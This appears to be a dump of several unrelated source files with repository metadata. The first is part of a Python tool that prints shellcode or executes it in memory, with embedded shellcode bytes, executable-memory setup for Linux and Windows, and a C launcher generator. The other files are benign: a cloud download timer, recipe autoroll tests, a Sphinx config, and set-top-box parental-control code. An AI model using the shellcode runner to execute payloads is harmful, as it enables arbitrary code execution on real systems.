b'\xccT_1\xc0\xf3\xaaH\x83\xef\x18AXAYjhT^WVQQj\x10j\x01QQQQ\xbb$' +
b'\x05\x1az\xe8E\xff\xff\xffj\xffZH\x8b\x0f\xbbvQ\x94\xd8\xe85\xff' +
b'\xff\xff1\xc9\xbb\xd5\xa5\xc9B\xeb\xf2',
}
def normalize_arch(arch):
"""Normalize the name of an architecture"""
arch = arch.lower()
if arch == 'arm' or re.match(r'^arm(v[1-9]+)?l$', arch):
return 'arm_l'
if arch == 'aarch64':
return 'arm64'
if re.match(r'^i[3-6]86$', arch) or arch in ('x86', 'x86-32'):
return 'x86_32'
if arch in ('amd64', 'x86-64'):
return 'x86_64'
return arch
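# Editor's note: illustrative examples of the normalization above:
#   normalize_arch('armv7l') -> 'arm_l'
#   normalize_arch('aarch64') -> 'arm64'
#   normalize_arch('i686') -> 'x86_32'
#   normalize_arch('amd64') -> 'x86_64'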
def run_code_linux(shellcode):
"""Run the specified shellcode on Linux"""
# Find functions in libc
libc = ctypes.CDLL(ctypes.util.find_library('c'))
libc.mmap.restype = ctypes.c_void_p
libc.mprotect.argtypes = [ctypes.c_void_p, ctypes.c_int, ctypes.c_int]
# Allocate memory with a RW private anonymous mmap
# PROT_READ=1, PROT_WRITE=2, PROT_EXEC=4
mem = libc.mmap(0, len(shellcode), 3, 0x22, -1, 0)
if int(mem) & 0xffffffff == 0xffffffff:
libc.perror(b"mmap")
return 1
# Copy the shellcode
ctypes.memmove(mem, shellcode, len(shellcode))
# Change protection to RX
if libc.mprotect(mem, len(shellcode), 5) == -1:
libc.perror(b"mprotect")
return 1
# Run!
return ctypes.CFUNCTYPE(ctypes.c_int)(mem)()
def run_code_windows(shellcode):
"""Run the specified shellcode on Windows"""
k32 = ctypes.windll.kernel32
k32.VirtualAlloc.restype = ctypes.c_void_p
int_p = ctypes.POINTER(ctypes.c_int)
k32.VirtualProtect.argtypes = [ctypes.c_void_p, ctypes.c_int, ctypes.c_int,
int_p]
# Allocate RW memory of type MEM_COMMIT | MEM_RESERVE (=0x1000|0x2000)
# PAGE_READWRITE = 4
mem = k32.VirtualAlloc(0, len(shellcode), 0x3000, 4)
if not mem:
sys.stderr.write("VirtualAlloc: {}\n".format(ctypes.FormatError()))
return 1
# Copy the shellcode
ctypes.memmove(mem, shellcode, len(shellcode))
# Change protection to PAGE_EXECUTE_READ = 0x20
oldprot = ctypes.c_int()
if not k32.VirtualProtect(mem, len(shellcode), 32, ctypes.byref(oldprot)):
sys.stderr.write("VirtualProtect: {}\n".format(ctypes.FormatError()))
return 1
# Run!
return ctypes.CFUNCTYPE(ctypes.c_int)(mem)()
def main(argv=None):
parser = argparse.ArgumentParser(description="Print or run a shellcode")
parser.add_argument('-b', '--binary', action='store_true',
help="print a binary version of the shellcode")
parser.add_argument('-c', '--c-prgm', action='store_true',
help="output a C program which launches the shellcode")
parser.add_argument('-m', '--machine', type=str,
help="machine architecture to use")
parser.add_argument('-q', '--quiet', action='store_true',
help="do not print the shellcode")
parser.add_argument('-r', '--run', action='store_true',
help="run the shellcode")
parser.add_argument('-x', '--hexa', action='store_true',
help="print the shellcode in hexadecimal")
parser.add_argument('-v', '--verbose', action='store_true',
help="be more verbose")
parser.add_argument('-L', '--linux', action='store_const',
dest='platform', const='Linux',
help="use Linux platform")
parser.add_argument('-W', '--windows', action='store_const',
dest='platform', const='Windows',
help="use Windows platform")
args = parser.parse_args(argv)
# Find out which shellcode to use
plat_sys = args.platform or platform.system()
plat_mach = normalize_arch(args.machine or platform.machine())
plat_id = '{}.{}'.format(plat_sys, plat_mach)
shc = SHELLCODES.get(plat_id)
if shc is None:
sys.stderr.write("No shellcode found for {}\n".format(plat_id))
return 1
if args.verbose:
print("Platform: {}".format(plat_id))
# Convert the shellcode to a list of ints
if sys.version_info >= (3, ):
shc_ints = [by & 0xff for by in shc]
else:
shc_ints = [ord(by) for by in shc]
# Print the shellcode
if args.c_prgm:
print('static __attribute__((__section__(".text"), __aligned__(4)))')
print('const unsigned char shellcode[{}] = {{'.format(len(shc)))
for idx in range(0, len(shc), 12):
text_data = ('0x{:02x}'.format(by) for by in shc_ints[idx:idx+12])
print(' {},'.format(', '.join(text_data)))
print('};')
print('')
print('int main(void)')
print('{')
print(' ((void (*)(void))shellcode)();')
print(' return 0;')
print('}')
elif not args.quiet:
if args.binary:
if hasattr(sys.stdout, 'buffer'):
sys.stdout.buffer.write(shc)
else:
sys.stdout.write(shc)
elif args.hexa:
print(''.join('{:02x}'.format(by) for by in shc_ints))
else:
text = repr(shc)
if text[0] == 'b':
text = text[1:]
print(text.strip('"\''))
# Run the shellcode
if args.run:
if plat_sys == 'Linux':
return run_code_linux(shc)
if plat_sys == 'Windows':
return run_code_windows(shc)
sys.stderr.write("System {} not implemented\n".format(plat_sys))
return 1
return 0
if __name__ == '__main__':
if sys.version_info < (2, 7):
sys.stderr.write("This program cannot be run in Python<2.7 mode.\n")
sys.exit(0)
sys.exit(main())
| mit | -9,078,079,875,954,633,000 | 37.165957 | 79 | 0.60553 | false |
bingjin/CloudTesting | test_cos/download.py | 1 | 1617 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Author: [email protected]
# Copyright: Public Domain
#
import time
import requests
import oss2
from qcloud_cos import StatFileRequest
from qcloud_cos import CosClient
def download_oss(file):
access_key = '# fill in with your own value'
access_secret = '# fill in with your own value'
auth = oss2.Auth(access_key, access_secret)
endpoint = '# fill in with your own value'
bucket = oss2.Bucket(auth, endpoint, '# fill in with your own value')
download_url = bucket.sign_url('GET', file, 60)
start = time.time()
r = requests.get(download_url, timeout=60)
end = time.time()
if r.status_code != 200:
return 0
elapsed = (end - start) * 1000.0
print 'OSS Download File Time %0.3f ms' % elapsed
return elapsed
def download_cos(file):
appid = 100000 # fill in with your own value
secret_id = u'# fill in with your own value'
secret_key = u'# fill in with your own value'
region = '# fill in with your own value'
bucket = u'# fill in with your own value'
cos_client = CosClient(appid, secret_id, secret_key, region)
request = StatFileRequest(bucket, u'/' + file)
stat = cos_client.stat_file(request)
if stat['code'] != 0:
return 0
download_url = stat['data']['source_url'] # URL for direct access over the public network
start = time.time()
r = requests.get(download_url, timeout=60)
end = time.time()
if r.status_code != 200:
return 0
elapsed = (end - start) * 1000.0
print 'COS Download File Time %0.3f ms' % elapsed
return elapsed
| mit | 6,060,852,200,900,478,000 | 24.245614 | 64 | 0.632384 | false |
luci/recipes-py | unittests/autoroll_test.py | 2 | 20801 | #!/usr/bin/env vpython
# Copyright 2016 The LUCI Authors. All rights reserved.
# Use of this source code is governed under the Apache License, Version 2.0
# that can be found in the LICENSE file.
from __future__ import print_function
import json
import sys
from google.protobuf import json_format as jsonpb
import test_env
def add_repo_with_basic_upstream_dependency(deps):
"""Does:
Create `upstream` repo with `up_mod` module, containing a single method
`cool_step`.
Make the main repo depend on this module, and use the module for a recipe
`my_recipe`.
Run simulation training for the main repo, and commit the result.
"""
upstream = deps.add_repo('upstream')
# Set up a recipe in main_repo depending on a module in upstream
with upstream.write_module('up_mod') as mod:
mod.api.write('''
def cool_method(self):
self.m.step('upstream step', ['echo', 'whats up'])
''')
up_commit = upstream.commit('add "up_mod"')
# Now use the upstream module in main_repo
with deps.main_repo.edit_recipes_cfg_pb2() as pkg_pb:
pkg_pb.deps['upstream'].revision = up_commit.revision
with deps.main_repo.write_recipe('my_recipe') as recipe:
recipe.DEPS = ['upstream/up_mod']
recipe.RunSteps.write('''
api.up_mod.cool_method()
''')
deps.main_repo.recipes_py('test', 'train')
deps.main_repo.commit('depend on upstream/up_mod')
class AutorollSmokeTest(test_env.RecipeEngineUnitTest):
def run_roll(self, deps, *args):
"""Runs the autoroll command and returns JSON.
Does not commit the resulting roll.
"""
outfile = self.tempfile()
output, retcode = deps.main_repo.recipes_py(
'-v', '-v', 'autoroll', '--verbose-json', '--output-json',
outfile, *args
)
if retcode != 0:
print(output, file=sys.stdout)
raise Exception('Roll failed')
with open(outfile) as fil:
return json.load(fil)
def test_empty(self):
"""Tests the scenario where there are no roll candidates."""
deps = self.FakeRecipeDeps()
roll_result = self.run_roll(deps)
self.assertTrue(roll_result['success'])
self.assertEqual([], roll_result['roll_details'])
self.assertEqual([], roll_result['rejected_candidate_specs'])
def test_trivial(self):
"""Tests the simplest trivial (i.e. no expectation changes) roll scenario.
"""
# prep
deps = self.FakeRecipeDeps()
upstream = deps.add_repo('upstream')
with upstream.write_file('some_file') as buf:
buf.write('hi!')
upstream_commit = upstream.commit('c1')
# test
spec = deps.main_repo.recipes_cfg_pb2
roll_result = self.run_roll(deps)
self.assertTrue(roll_result['success'])
self.assertTrue(roll_result['trivial'])
spec.deps['upstream'].revision = upstream_commit.revision
expected_picked_roll = {
'commit_infos': {
'upstream': [
upstream_commit.as_roll_info(),
],
},
'spec': jsonpb.MessageToDict(spec, preserving_proto_field_name=True),
}
self.assertEqual(expected_picked_roll['commit_infos'],
roll_result['picked_roll_details']['commit_infos'])
self.assertEqual(expected_picked_roll['spec'],
roll_result['picked_roll_details']['spec'])
self.assertEqual(
0, roll_result['picked_roll_details']['recipes_simulation_test']['rc'])
def test_nontrivial(self):
"""Tests the simplest nontrivial (i.e. expectation changes) roll scenario.
"""
deps = self.FakeRecipeDeps()
add_repo_with_basic_upstream_dependency(deps)
upstream = deps.repos['upstream']
spec = deps.main_repo.recipes_cfg_pb2
# Change implementation of up_mod in a way that's compatible, but changes
# expectations.
with upstream.write_module('up_mod') as mod:
mod.api.write('''
def cool_method(self):
self.m.step('upstream step', ['echo', 'whats down'])
''')
up_commit = upstream.commit('change "up_mod"')
# Roll again, and we can see the non-trivial roll now.
roll_result = self.run_roll(deps)
self.assertTrue(roll_result['success'])
self.assertFalse(roll_result['trivial'])
spec.deps['upstream'].revision = up_commit.revision
expected_picked_roll = {
'commit_infos': {
'upstream': [
up_commit.as_roll_info()
],
},
'spec': jsonpb.MessageToDict(spec, preserving_proto_field_name=True),
}
picked_roll = roll_result['picked_roll_details']
self.assertEqual(expected_picked_roll['commit_infos'],
picked_roll['commit_infos'])
self.assertEqual(expected_picked_roll['spec'],
picked_roll['spec'])
self.assertEqual(
1, picked_roll['recipes_simulation_test']['rc'])
self.assertEqual(
0, picked_roll['recipes_simulation_test_train']['rc'])
def test_failure(self):
"""Tests the simplest scenario where an automated roll is not possible
because of incompatible API changes.
"""
deps = self.FakeRecipeDeps()
add_repo_with_basic_upstream_dependency(deps)
upstream = deps.repos['upstream']
# Change API of the recipe module in a totally incompatible way.
with upstream.write_module('up_mod') as mod:
mod.api.write('''
def uncool_method(self):
self.m.step('upstream step', ['echo', 'whats up'])
''')
upstream.commit('add incompatibility')
# watch our roll fail
roll_result = self.run_roll(deps)
self.assertFalse(roll_result['success'])
def test_jump_over_failure(self):
"""Tests whether the roller considers pulling more commits to make
the roll succeed, when earlier ones have incompatible API changes
fixed later.
"""
deps = self.FakeRecipeDeps()
add_repo_with_basic_upstream_dependency(deps)
upstream = deps.repos['upstream']
spec = deps.main_repo.recipes_cfg_pb2
# Change API of the recipe module in an incompatible way.
with upstream.write_module('up_mod') as mod:
mod.api.write('''
def uncool_method(self):
self.m.step('upstream step', ['echo', 'whats up'])
''')
middle_commit = upstream.commit('add incompatibility')
# Restore compatibility, but change expectations.
with upstream.write_module('up_mod') as mod:
mod.api.write('''
def cool_method(self):
self.m.step('upstream step', ['echo', 'whats down'])
''')
final_commit = upstream.commit('restore similar method')
roll_result = self.run_roll(deps)
self.assertTrue(roll_result['success'])
self.assertFalse(roll_result['trivial'])
spec.deps['upstream'].revision = final_commit.revision
expected_picked_roll = {
'commit_infos': {
'upstream': [
middle_commit.as_roll_info(),
final_commit.as_roll_info(),
],
},
'spec': jsonpb.MessageToDict(spec, preserving_proto_field_name=True),
}
picked_roll = roll_result['picked_roll_details']
self.assertEqual(expected_picked_roll['commit_infos'],
picked_roll['commit_infos'])
self.assertEqual(expected_picked_roll['spec'],
picked_roll['spec'])
self.assertEqual(
1, picked_roll['recipes_simulation_test']['rc'])
self.assertEqual(
0, picked_roll['recipes_simulation_test_train']['rc'])
def test_pick_smallest_nontrivial_roll(self):
"""Test that with several nontrivial rolls possible, the minimal one
is picked.
"""
deps = self.FakeRecipeDeps()
add_repo_with_basic_upstream_dependency(deps)
upstream = deps.repos['upstream']
spec = deps.main_repo.recipes_cfg_pb2
# Change API of the recipe module in an incompatible way.
with upstream.write_module('up_mod') as mod:
mod.api.write('''
def uncool_method(self):
self.m.step('upstream step', ['echo', 'whats up'])
''')
middle_commit = upstream.commit('add incompatibility')
# Restore compatibility, but change expectations.
with upstream.write_module('up_mod') as mod:
mod.api.write('''
def cool_method(self):
self.m.step('upstream step', ['echo', 'whats down'])
''')
final_commit = upstream.commit('restore similar method')
# Create another change that would result in a nontrivial roll,
# which should not be picked - nontrivial rolls should be minimal.
with upstream.write_module('up_mod') as mod:
mod.api.write('''
def cool_method(self):
self.m.step('upstream step', ['echo', 'whats superdown'])
''')
upstream.commit('second nontrivial change')
roll_result = self.run_roll(deps)
self.assertTrue(roll_result['success'])
self.assertFalse(roll_result['trivial'])
spec.deps['upstream'].revision = final_commit.revision
expected_picked_roll = {
'commit_infos': {
'upstream': [
middle_commit.as_roll_info(),
final_commit.as_roll_info(),
],
},
'spec': jsonpb.MessageToDict(spec, preserving_proto_field_name=True),
}
picked_roll = roll_result['picked_roll_details']
self.assertEqual(expected_picked_roll['commit_infos'],
picked_roll['commit_infos'])
self.assertEqual(expected_picked_roll['spec'],
picked_roll['spec'])
self.assertEqual(
1, picked_roll['recipes_simulation_test']['rc'])
self.assertEqual(
0, picked_roll['recipes_simulation_test_train']['rc'])
def test_pick_largest_trivial_roll(self):
"""Test that with several trivial rolls possible, the largest one is picked.
This helps avoid noise with several rolls where one is sufficient,
with no expectation changes.
"""
deps = self.FakeRecipeDeps()
add_repo_with_basic_upstream_dependency(deps)
upstream = deps.repos['upstream']
spec = deps.main_repo.recipes_cfg_pb2
# Change API of the recipe module in an incompatible way.
with upstream.write_module('up_mod') as mod:
mod.api.write('''
def uncool_method(self):
self.m.step('upstream step', ['echo', 'whats up'])
''')
first_commit = upstream.commit('add incompatibility')
# Restore compatibility, but change expectations.
with upstream.write_module('up_mod') as mod:
mod.api.write('''
def cool_method(self):
self.m.step('upstream step', ['echo', 'whats down'])
''')
second_commit = upstream.commit('restore similar method')
# Create another change that would result in a nontrivial roll,
# which should not be picked - nontrivial rolls should be minimal.
with upstream.write_module('up_mod') as mod:
mod.api.write('''
def cool_method(self):
self.m.step('upstream step', ['echo', 'whats superdown'])
''')
third_commit = upstream.commit('second nontrivial change')
# Introduce another commit which makes the roll trivial again.
with upstream.write_module('up_mod') as mod:
mod.api.write('''
def cool_method(self):
self.m.step('upstream step', ['echo', 'whats up'])
''')
final_commit = upstream.commit('restore original behavior')
roll_result = self.run_roll(deps)
self.assertTrue(roll_result['success'])
self.assertTrue(roll_result['trivial'])
spec.deps['upstream'].revision = final_commit.revision
expected_picked_roll = {
'commit_infos': {
'upstream': [
first_commit.as_roll_info(),
second_commit.as_roll_info(),
third_commit.as_roll_info(),
final_commit.as_roll_info(),
],
},
'spec': jsonpb.MessageToDict(spec, preserving_proto_field_name=True),
}
picked_roll = roll_result['picked_roll_details']
self.assertEqual(expected_picked_roll['commit_infos'],
picked_roll['commit_infos'])
self.assertEqual(expected_picked_roll['spec'],
picked_roll['spec'])
self.assertEqual(
0, picked_roll['recipes_simulation_test']['rc'])
def test_find_minimal_candidate(self):
"""Tests that the roller can automatically find a viable minimal
roll candidate, in a scenario where previous roll algorithm
was getting stuck.
"""
deps = self.FakeRecipeDeps()
upstream = deps.add_repo('upstream')
super_upstream = deps.add_repo('super_upstream')
spec = deps.main_repo.recipes_cfg_pb2
# Now make upstream depend on super_upstream, then roll that into the main
# repo.
upstream.add_dep('super_upstream')
super_commit = upstream.commit('add dep on super_upstream')
with deps.main_repo.edit_recipes_cfg_pb2() as pkg_pb:
pkg_pb.deps['upstream'].revision = super_commit.revision
deps.main_repo.commit('roll upstream')
# Set up a recipe in the main repo depending on a module in upstream.
with upstream.write_module('up_mod') as mod:
mod.api.write('''
def cool_method(self):
self.m.step('upstream step', ['echo', 'whats up'])
''')
up_commit = upstream.commit('add up_mod')
with deps.main_repo.edit_recipes_cfg_pb2() as pkg_pb:
pkg_pb.deps['upstream'].revision = up_commit.revision
with deps.main_repo.write_recipe('my_recipe') as recipe:
recipe.DEPS = ['upstream/up_mod']
recipe.RunSteps.write('''
api.up_mod.cool_method()
''')
deps.main_repo.recipes_py('test', 'train')
deps.main_repo.commit('depend on upstream/up_mod')
# Create a new commit in the super_upstream repo and roll it into upstream.
super_commit = super_upstream.commit('trivial commit')
with upstream.edit_recipes_cfg_pb2() as pkg_pb:
pkg_pb.deps['super_upstream'].revision = super_commit.revision
super_roll = upstream.commit('roll super_upstream')
# Change API of the upstream module in an incompatible way.
with upstream.write_module('up_mod') as mod:
mod.api.write('''
def uncool_method(self):
self.m.step('upstream step', ['echo', 'whats up'])
''')
up_commit = upstream.commit('incompatible up_mod')
roll_result = self.run_roll(deps)
self.assertTrue(roll_result['success'])
self.assertTrue(roll_result['trivial'])
spec.deps['super_upstream'].revision = super_commit.revision
spec.deps['upstream'].revision = super_roll.revision
expected_picked_roll = {
'commit_infos': {
'upstream': [super_roll.as_roll_info()],
'super_upstream': [super_commit.as_roll_info()],
},
'spec': jsonpb.MessageToDict(spec, preserving_proto_field_name=True),
}
picked_roll = roll_result['picked_roll_details']
self.assertEqual(expected_picked_roll['commit_infos'],
picked_roll['commit_infos'])
self.assertEqual(expected_picked_roll['spec'],
picked_roll['spec'])
self.assertEqual(
0, picked_roll['recipes_simulation_test']['rc'])
def test_no_backwards_roll(self):
"""Tests that we never roll backwards."""
deps = self.FakeRecipeDeps()
upstream = deps.add_repo('upstream')
super_upstream = deps.add_repo('super_upstream')
original_super_commit = super_upstream.backend.commit_metadata('HEAD')
upstream.add_dep('super_upstream')
upstream.commit('add dep on super_upstream')
# Create a new commit in super_upstream repo and roll it to upstream.
super_commit = super_upstream.commit('trivial commit')
with upstream.edit_recipes_cfg_pb2() as pkg_pb:
pkg_pb.deps['super_upstream'].revision = super_commit.revision
up_commit = upstream.commit('roll')
# Roll above commits to main_repo.
with deps.main_repo.edit_recipes_cfg_pb2() as pkg_pb:
pkg_pb.deps['upstream'].revision = up_commit.revision
pkg_pb.deps['super_upstream'].revision = super_commit.revision
deps.main_repo.commit('roll upstream+super_upstream')
spec = deps.main_repo.recipes_cfg_pb2
# Create a new commit in upstream that would result in backwards roll.
with upstream.edit_recipes_cfg_pb2() as pkg_pb:
pkg_pb.deps['super_upstream'].revision = original_super_commit.revision
up_commit = upstream.commit('backwards commit')
roll_result = self.run_roll(deps)
self.assertTrue(roll_result['success'])
self.assertEqual([], roll_result['roll_details'])
spec.deps['upstream'].revision = up_commit.revision
self.assertEqual(
roll_result['rejected_candidate_specs'],
[jsonpb.MessageToDict(spec, preserving_proto_field_name=True)],
)
def test_inconsistent_errors(self):
deps = self.FakeRecipeDeps()
upstream = deps.add_repo('upstream')
upstream_deeper = deps.add_repo('upstream_deeper')
upstream_deepest = deps.add_repo('upstream_deepest')
# Add:
# upstream_deeper -> upstream_deepest
# upstream -> upstream_deeper
# upstream -> upstream_deepest
upstream_deeper.add_dep('upstream_deepest')
upstream_deeper.commit('add dep on upstream_deepest')
upstream.add_dep('upstream_deeper', 'upstream_deepest')
upstream.commit('add dep on upstream_deepest + upstream_deeper')
# Roll all of that into main.
self.run_roll(deps)
# Create a new commit in deepest repo and roll it to deeper.
deepest_commit = upstream_deepest.commit('deep commit')
with upstream_deeper.edit_recipes_cfg_pb2() as pkg_pb:
pkg_pb.deps['upstream_deepest'].revision = deepest_commit.revision
upstream_deeper.commit('roll deepest')
# We shouldn't be able to roll upstream_deeper/upstream_deepest until
# upstream includes them. i.e. there should be no roll, because there are no
# valid roll candidates.
roll_result = self.run_roll(deps)
self.assertTrue(roll_result['success'])
self.assertEqual([], roll_result['roll_details'])
self.assertGreater(len(roll_result['rejected_candidate_specs']), 0)
def test_inconsistent_candidates_do_not_advance(self):
deps = self.FakeRecipeDeps()
upstream = deps.add_repo('upstream')
upstream_deeper = deps.add_repo('upstream_deeper')
# Add:
# upstream -> upstream_deeper
upstream.add_dep('upstream_deeper')
upstream.commit('add dep on upstream_deeper')
# Roll all of that into main.
self.run_roll(deps)
# Create 2 commits in deepest repo that are not rolled into anything
with upstream_deeper.write_module('deeper1_mod') as mod:
mod.api.write('''
def method(self):
self.m.step('deeper1 step', ['echo', 'whats up'])
''')
upstream_deeper.commit('add deeper1_mod')
with upstream_deeper.write_module('deeper2_mod') as mod:
mod.api.write('''
def method(self):
self.m.step('deeper2 step', ['echo', 'whats up'])
''')
upstream_deeper.commit('add deeper2_mod')
# Create a commit in the upstream repo
with upstream.write_module('upstream_mod') as mod:
mod.api.write('''
def method(self):
self.m.step('upstream step', ['echo', 'whats up'])
''')
upstream_commit = upstream.commit('add upstream_mod')
# We can't roll either commit in upstream_deeper because they are
# inconsistent with upstream's pin for upstream_deeper, but upstream's
# commit should still be able to roll
roll_result = self.run_roll(deps)
self.assertTrue(roll_result['success'])
spec = deps.main_repo.recipes_cfg_pb2
expected_picked_roll = {
'commit_infos': {
'upstream': [upstream_commit.as_roll_info(),],
},
'spec': jsonpb.MessageToDict(spec, preserving_proto_field_name=True),
}
picked_roll = roll_result['picked_roll_details']
self.assertEqual(expected_picked_roll['commit_infos'],
picked_roll['commit_infos'])
self.assertEqual(expected_picked_roll['spec'], picked_roll['spec'])
def test_roll_adds_dependency(self):
deps = self.FakeRecipeDeps()
upstream = deps.add_repo('upstream')
other = deps.add_repo('other')
with deps.main_repo.edit_recipes_cfg_pb2() as spec:
del spec.deps['other']
deps.main_repo.commit('remove other dep')
spec = deps.main_repo.recipes_cfg_pb2
roll_result = self.run_roll(deps)
self.assertTrue(roll_result['success'])
self.assertEqual(spec, deps.main_repo.recipes_cfg_pb2) # noop
# Now we add a commit to 'upstream' which pulls in 'other'.
upstream.add_dep('other')
upstream.commit('add other dep')
with upstream.write_file('trivial') as fil:
fil.write('trivial file')
up_commit = upstream.commit('add trivial file')
roll_result = self.run_roll(deps)
self.assertTrue(roll_result['success'])
spec.deps['upstream'].revision = up_commit.revision
spec.deps['other'].CopyFrom(upstream.recipes_cfg_pb2.deps['other'])
self.assertEqual(spec, deps.main_repo.recipes_cfg_pb2)
if __name__ == '__main__':
test_env.main()
| apache-2.0 | -3,812,016,209,446,625,000 | 34.018519 | 80 | 0.650161 | false |
openstack/networking-odl | doc/source/conf.py | 1 | 2835 | # -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
sys.path.insert(0, os.path.abspath('../..'))
# -- General configuration ----------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = [
'sphinx.ext.autodoc',
#'sphinx.ext.intersphinx',
'openstackdocstheme',
'oslo_config.sphinxext',
]
# openstackdocstheme options
openstackdocs_repo_name = 'openstack/networking-odl'
openstackdocs_pdf_link = True
openstackdocs_auto_name = False
openstackdocs_bug_project = 'networking-odl'
openstackdocs_bug_tag = 'doc'
# autodoc generation is a bit aggressive and a nuisance when doing heavy
# text edit cycles.
# execute "export SPHINX_DEBUG=1" in your terminal to disable
# The suffix of source filenames.
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'networking-odl'
copyright = '2013, OpenStack Foundation'
# If true, '()' will be appended to :func: etc. cross-reference text.
add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
add_module_names = True
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'native'
# -- Options for HTML output --------------------------------------------------
# The theme to use for HTML and HTML Help pages. Major themes that come with
# Sphinx are currently 'default' and 'sphinxdoc'.
# html_theme_path = ["."]
html_theme = 'openstackdocs'
# html_static_path = ['static']
# Output file base name for HTML help builder.
htmlhelp_basename = '%sdoc' % project
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass
# [howto/manual]).
latex_documents = [
('index',
'doc-%s.tex' % project,
'%s Documentation' % project,
'OpenStack Foundation', 'manual'),
]
# Example configuration for intersphinx: refer to the Python standard library.
#intersphinx_mapping = {'http://docs.python.org/': None}
latex_elements = {
'makeindex': '',
'printindex': '',
'preamble': r'\setcounter{tocdepth}{3}',
}
| apache-2.0 | -4,264,224,869,683,919,400 | 30.853933 | 79 | 0.694533 | false |
BlackHole/enigma2-obh10 | lib/python/Components/ParentalControl.py | 2 | 12140 | from Components.config import config, ConfigSubsection, ConfigSelection, ConfigPIN, ConfigYesNo, ConfigSubList, ConfigInteger
from Components.ServiceList import refreshServiceList
from Screens.InputBox import PinInput
from Screens.MessageBox import MessageBox
from Tools.BoundFunction import boundFunction
from ServiceReference import ServiceReference
from Tools import Notifications
from Tools.Directories import resolveFilename, SCOPE_CONFIG
from Tools.Notifications import AddPopup
from enigma import eTimer, eServiceCenter, iServiceInformation, eServiceReference, eDVBDB
import time
import os
TYPE_SERVICE = "SERVICE"
TYPE_BOUQUETSERVICE = "BOUQUETSERVICE"
TYPE_BOUQUET = "BOUQUET"
LIST_BLACKLIST = "blacklist"
def InitParentalControl():
config.ParentalControl = ConfigSubsection()
config.ParentalControl.storeservicepin = ConfigSelection(default="never", choices=[("never", _("never")), ("5", _("%d minutes") % 5), ("30", _("%d minutes") % 30), ("60", _("%d minutes") % 60), ("standby", _("until standby/restart"))])
config.ParentalControl.configured = ConfigYesNo(default=False)
config.ParentalControl.setuppinactive = ConfigYesNo(default=False)
config.ParentalControl.retries = ConfigSubsection()
config.ParentalControl.retries.servicepin = ConfigSubsection()
config.ParentalControl.retries.servicepin.tries = ConfigInteger(default=3)
config.ParentalControl.retries.servicepin.time = ConfigInteger(default=3)
config.ParentalControl.servicepin = ConfigSubList()
config.ParentalControl.servicepin.append(ConfigPIN(default=0))
config.ParentalControl.age = ConfigSelection(default="18", choices=[("0", _("No age block"))] + list((str(x), "%d+" % x) for x in range(3, 19)))
config.ParentalControl.hideBlacklist = ConfigYesNo(default=False)
config.ParentalControl.config_sections = ConfigSubsection()
config.ParentalControl.config_sections.main_menu = ConfigYesNo(default=False)
config.ParentalControl.config_sections.configuration = ConfigYesNo(default=False)
config.ParentalControl.config_sections.timer_menu = ConfigYesNo(default=False)
config.ParentalControl.config_sections.plugin_browser = ConfigYesNo(default=False)
config.ParentalControl.config_sections.standby_menu = ConfigYesNo(default=False)
config.ParentalControl.config_sections.software_update = ConfigYesNo(default=False)
config.ParentalControl.config_sections.manufacturer_reset = ConfigYesNo(default=True)
config.ParentalControl.config_sections.movie_list = ConfigYesNo(default=False)
config.ParentalControl.config_sections.context_menus = ConfigYesNo(default=False)
config.ParentalControl.config_sections.vixmenu = ConfigYesNo(default=False)
#Added for backwards compatibility with some 3rd party plugins that depend on this config
config.ParentalControl.servicepinactive = config.ParentalControl.configured
config.ParentalControl.setuppin = config.ParentalControl.servicepin[0]
config.ParentalControl.retries.setuppin = config.ParentalControl.retries.servicepin
config.ParentalControl.type = ConfigSelection(default="blacklist", choices=[(LIST_BLACKLIST, _("blacklist"))])
global parentalControl
parentalControl = ParentalControl()
class ParentalControl:
def __init__(self):
#Do not call open on init, because bouquets are not ready at that moment
self.filesOpened = False
self.PinDlg = None
#This is the timer that is used to see, if the time for caching the pin is over
#Of course we could also work without a timer and compare the times every
		#time we call isServicePlayable. But this would probably slow down zapping,
#That's why I decided to use a timer
self.sessionPinTimer = eTimer()
self.sessionPinTimer.callback.append(self.resetSessionPin)
self.getConfigValues()
def serviceMethodWrapper(self, service, method, *args):
#This method is used to call all functions that need a service as Parameter:
#It takes either a Service- Reference or a Bouquet- Reference and passes
#Either the service or all services contained in the bouquet to the method given
#That way all other functions do not need to distinguish between service and bouquet.
if "FROM BOUQUET" in service:
method(service, TYPE_BOUQUET, *args)
servicelist = self.readServicesFromBouquet(service, "C")
for ref in servicelist:
sRef = str(ref[0])
method(sRef, TYPE_BOUQUETSERVICE, *args)
else:
ref = ServiceReference(service)
sRef = str(ref)
method(sRef, TYPE_SERVICE, *args)
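		# A usage sketch (hypothetical references, not taken from this module): the
		# wrapper accepts either a plain service reference or a bouquet reference, e.g.
		#   self.serviceMethodWrapper('1:0:1:1234:5678:1:C00000:0:0:0:', self.addServiceToList, self.blacklist)
		#   self.serviceMethodWrapper('1:7:1:0:0:0:0:0:0:0:FROM BOUQUET "userbouquet.favourites.tv" ORDER BY bouquet', self.addServiceToList, self.blacklist)
		# In the bouquet case every contained service is passed on as TYPE_BOUQUETSERVICE.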
def isProtected(self, ref):
if not config.ParentalControl.servicepinactive.value or not ref:
return False
#Check if configuration has already been read or if the significant values have changed.
#If true: read the configuration
if self.storeServicePin != config.ParentalControl.storeservicepin.value:
self.getConfigValues()
service = ref.toCompareString()
path = ref.getPath()
info = eServiceCenter.getInstance().info(ref)
age = 0
if path.startswith("/"):
if service.startswith("1:"):
refstr = info and info.getInfoString(ref, iServiceInformation.sServiceref)
service = refstr and eServiceReference(refstr).toCompareString()
if [x for x in path[1:].split("/") if x.startswith(".") and not x == ".Trash"]:
age = 18
elif int(config.ParentalControl.age.value):
event = info and info.getEvent(ref)
rating = event and event.getParentalData()
age = rating and rating.getRating()
